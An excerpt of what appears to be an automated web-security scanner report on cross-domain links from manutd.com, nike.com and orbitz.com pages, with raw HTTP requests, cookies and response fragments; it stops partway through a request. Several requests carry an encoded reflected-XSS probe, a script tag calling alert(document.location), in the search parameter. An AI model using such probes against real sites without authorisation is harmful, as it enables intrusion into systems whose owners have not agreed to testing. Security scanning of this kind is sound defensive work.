</script><script type="text/javascript" src="http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick="></script><noscript><a href="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adlink|3.0|512|2041640|0|16|ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="1" height="1" /></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|3106021|0|168|ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|999|3106021|0|168|ADTECH;cookie=info;loc=300;key=key1+key2+key3+key4" border="0" width="120" height="600"></a>
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://adserver.adtech.de/adserv|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4"><img src="&lt;link linktype=&quot;external&quot; url=&quot;http://adserver.adtech.de/adlink|3.0|999|2024223|0|168|ADTECH;loc=300;key=key1+key2+key3+key4&amp;quot; target=&amp;quot;_blank&amp;quot;&amp;
...[SNIP]...
</noscript><a href="http://www.stretfordend.co.uk/?lid=stretfordendbutton" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_SE.ashx" alt="" width="120" height="90" /></a><a href="http://www.turkishairlines.com/?lid=turkishairbutton/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Turkish.ashx" alt="" width="120" height="90" /></a><a href="http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Nike.ashx" alt="" width="120" height="90" /></a><a href="http://www.mufoundation.org/" target="_blank" class="adcolumnbtn"><img src="~/media/Images/Buttons/NewButtons/Button_Foundation.ashx" alt="Foundation" width="120" height="90" />
...[SNIP]...
<p>Copyright, Manchester United Ltd, 2011 <a href="http://editorial.gettyimages.com/ms_gins/source/frontdoors/manu.aspx" target="_blank" title="This link will open in a new window.">Photography provided by Manchester United Ltd and Getty Images</a>
...[SNIP]...
<li>designed by..
                   <a href="http://www.lightmaker.com" target="_blank" title="Lightmaker">Lightmaker</a>
...[SNIP]...
19.217. http://www.mufoundation.org/Search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mufoundation.org
Path:   /Search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Search.aspx?search=bond%20interest%20euro HTTP/1.1
Host: www.mufoundation.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mufoundation.org/en/Charities.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CP=null*; __utma=1.1494158951.1317599905.1317599905.1317599905.1; __utmb=1.4.10.1317599905; __utmc=1; __utmz=1.1317599905.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: WEB-P01
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Expires: Mon, 03 Oct 2011 00:02:51 GMT
Date: Mon, 03 Oct 2011 00:02:51 GMT
Content-Length: 12200
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="descriptionTag" name="des
...[SNIP]...
<div id="toplinkcontainer"><a class="donate-now" href="http://www.justgiving.com/manutd">Donate now</a>
...[SNIP]...
<div><a target="_blank" href="http://www.unicef.org.uk/"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1002115.jpg&amp;obj=iip,1.0&amp;wid=71&amp;hei=80&amp;cvt=jpeg" alt="United for Unicef"></a><a target="_blank" href="http://www.christies.org/"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1015199.jpg&amp;obj=iip,1.0&amp;wid=86&amp;hei=80&amp;cvt=jpeg" alt=""></a><a target="_blank" href="http://www.francishouse.org.uk/"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1002113.jpg&amp;obj=iip,1.0&amp;wid=82&amp;hei=80&amp;cvt=jpeg" alt="Francis House"></a><a href="http://www.premierleague.com/creatingchances"><img src="http://picsrv.manutd.com/?qlt=100&amp;fif=/Manutdasian/1015148.jpg&amp;obj=iip,1.0&amp;wid=449&amp;hei=73&amp;cvt=jpeg" alt="Cheating Chances"></a>
...[SNIP]...
<p>designed by..
   
               <a href="http://www.lightmaker.com">Lightmaker</a>
...[SNIP]...
19.218. http://www.nike.com/nikefootball/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikefootball/home/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954 HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; dfa_cookie=nikefootballglobal%2Cnikeall; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 76945
Cache-Control: max-age=813
Expires: Mon, 03 Oct 2011 00:16:14 GMT
Date: Mon, 03 Oct 2011 00:02:41 GMT
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equ
...[SNIP]...
<div class="secondaryButton" label="youtube" openonclick="true">
<a class="action" type="url" href="http://www.youtube.com/nikesoccer" >Youtube</a>
...[SNIP]...
<div class="secondaryButton" label="facebook" openonclick="true">
<a class="action" type="url" href="http://www.facebook.com/nikesoccer" >Facebook</a>
...[SNIP]...
<div class="secondaryButton" label="twitter" openonclick="true">
<a class="action" type="url" href="http://www.twitter.com/nikesoccer" >Twitter</a>
...[SNIP]...
<div class="secondaryButton" label="youtube" openonclick="true">
<a class="action" type="url" href="http://www.youtube.com/nikesoccer" >Youtube</a>
...[SNIP]...
<div class="secondaryButton" label="facebook" openonclick="true">
<a class="action" type="url" href="http://www.facebook.com/nikesoccer" >Facebook</a>
...[SNIP]...
<div class="secondaryButton" label="twitter" openonclick="true">
<a class="action" type="url" href="http://www.twitter.com/nikesoccer" >Twitter</a>
...[SNIP]...
<noscript>
<img class="tracking-img" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&amp;ActivityID=32985&ns=1" alt="" />
</noscript>
...[SNIP]...
<!-- Start of ATDMT tracking -->
<img class="tracking-img" src="http://view.atdmt.com/action/NSO_MainHomepage" alt="" />
<!-- End of ATDMT tracking -->
...[SNIP]...
<noscript>
<iframe class="tracking-img" src="http://fls.doubleclick.net/activityi;src=1902932;type=nikes020;cat=nikes409;ord=1;num=1?" frameborder="0"></iframe>
...[SNIP]...
<!--// HTML for non-js version of newsfeed //-->
<a href="http://www.facebook.com/nikesoccer" target="_blank" title="Facebook"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a href="http://www.facebook.com/nikesoccer" target="_blank" title="Facebook">Facebook</a>
...[SNIP]...
<p><a href="http://www.facebook.com/nikesoccer" target="_blank" title="Facebook">View the Nike Football Facebook page</a>
...[SNIP]...
<!--// HTML for non-js version of newsfeed //-->
<a href="http://www.youtube.com/nikesoccer" target="_blank" title="You Tube"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a href="http://www.youtube.com/nikesoccer" target="_blank" title="You Tube">You Tube</a>
...[SNIP]...
<p><a href="http://www.youtube.com/nikesoccer" target="_blank" title="You Tube">View the Nike Football YouTube channel</a>
...[SNIP]...
<!--// HTML for non-js version of newsfeed //-->
<a href="http://twitter.com/nikesoccer" target="_blank" title="Twitter"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a href="http://twitter.com/nikesoccer" target="_blank" title="Twitter">Twitter</a>
...[SNIP]...
<p><a href="http://twitter.com/nikesoccer" target="_blank" title="Twitter">View the Nike Football Twitter page</a>
...[SNIP]...
19.219. http://www.nike.com/nikefootball/home/socialfeeds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikefootball/home/socialfeeds

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nikefootball/home/socialfeeds?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 2479
Cache-Control: max-age=2641
Expires: Mon, 03 Oct 2011 00:46:46 GMT
Date: Mon, 03 Oct 2011 00:02:45 GMT
Connection: close

           
                                                                                                                               <li class="hero" data-url="http://inside.nike.com/blogs/nikesoccer/feeds/posts">
                       <a href="http://inside.nike.com/blogs/nikesoccer/2011/09/19/m
...[SNIP]...
<li data-url="http://www.facebook.com/feeds/page.php?format=rss20&id=51212153078">
                       <a href="http://www.facebook.com/photo.php?fbid=10150468680803079&set=a.90851843078.105133.51212153078&type=1"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a class="cfHeader" href="http://www.facebook.com/photo.php?fbid=10150468680803079&set=a.90851843078.105133.51212153078&type=1" title=" Power and precision. Perfect execution. Higuain marks his hat-trick with a strik...">Power and precision. Perfect execution. Higuain marks his hat-trick with a strik.....</a>
...[SNIP]...
<li data-url="http://gdata.youtube.com/feeds/base/users/Nikesoccer/uploads?alt=rss&v=2&orderby=published&client=ytapi-youtube-profile">
                       <a href="http://www.youtube.com/watch?v=3a_ShT_VfB8&feature=youtube_gdata"><img src="http://i.ytimg.com/vi/3a_ShT_VfB8/default.jpg" alt=""/></a>
...[SNIP]...
<h2><a class="cfHeader" href="http://www.youtube.com/watch?v=3a_ShT_VfB8&feature=youtube_gdata" title="The Process of Perfection: Nike Soccer">The Process of Perfection: Nike Soccer</a>
...[SNIP]...
19.220. http://www.nike.com/nikefootball/home/twitterfeed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikefootball/home/twitterfeed

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nikefootball/home/twitterfeed?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/2; s_sv_112_s1=1@16@a//1317599910141; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; dfa_cookie=nikefootballglobal%2Cnikeall%2Cnikesoccer%2Cnikefootballnam; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 846
Cache-Control: max-age=58
Expires: Mon, 03 Oct 2011 00:03:44 GMT
Date: Mon, 03 Oct 2011 00:02:46 GMT
Connection: close

           
                                                                                                                                                                                                                                                   <li data-url="http://twitter.com/statuses/user_timeline/10678292.rss">
                           
                           <a href="http://twitter.com/nikesoccer/statuses/120645997234892800"><img src="/nikefootball/assets/homepage/images/homepanel/placeholder-hero-soccer.jpg" alt=""/>
...[SNIP]...
<h2><a class="cfHeader" href="http://twitter.com/nikesoccer/statuses/120645997234892800" title="nikesoccer: @ProfNasr Yes it is! We hope you like the T90 Laser IV. Let us know how they treat you.">nikesoccer: @ProfNasr Yes it is! We hope you like the T90 Laser IV. Let us know how...</a>
...[SNIP]...
19.221. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousB
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Length: 3233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Searching for
...[SNIP]...
<div id="ad">
    <iframe allowtransparency="true" height="340" width="550" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111384&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111384&" height="340" width="550" border="0"></a>
...[SNIP]...
19.222. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="ad">
            <iframe allowtransparency="true" height="340" width="550" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&" height="340" width="550" border="0"></a>
...[SNIP]...
19.223. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /App/SubmitQuickSearch?z=bfe6&r=h HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
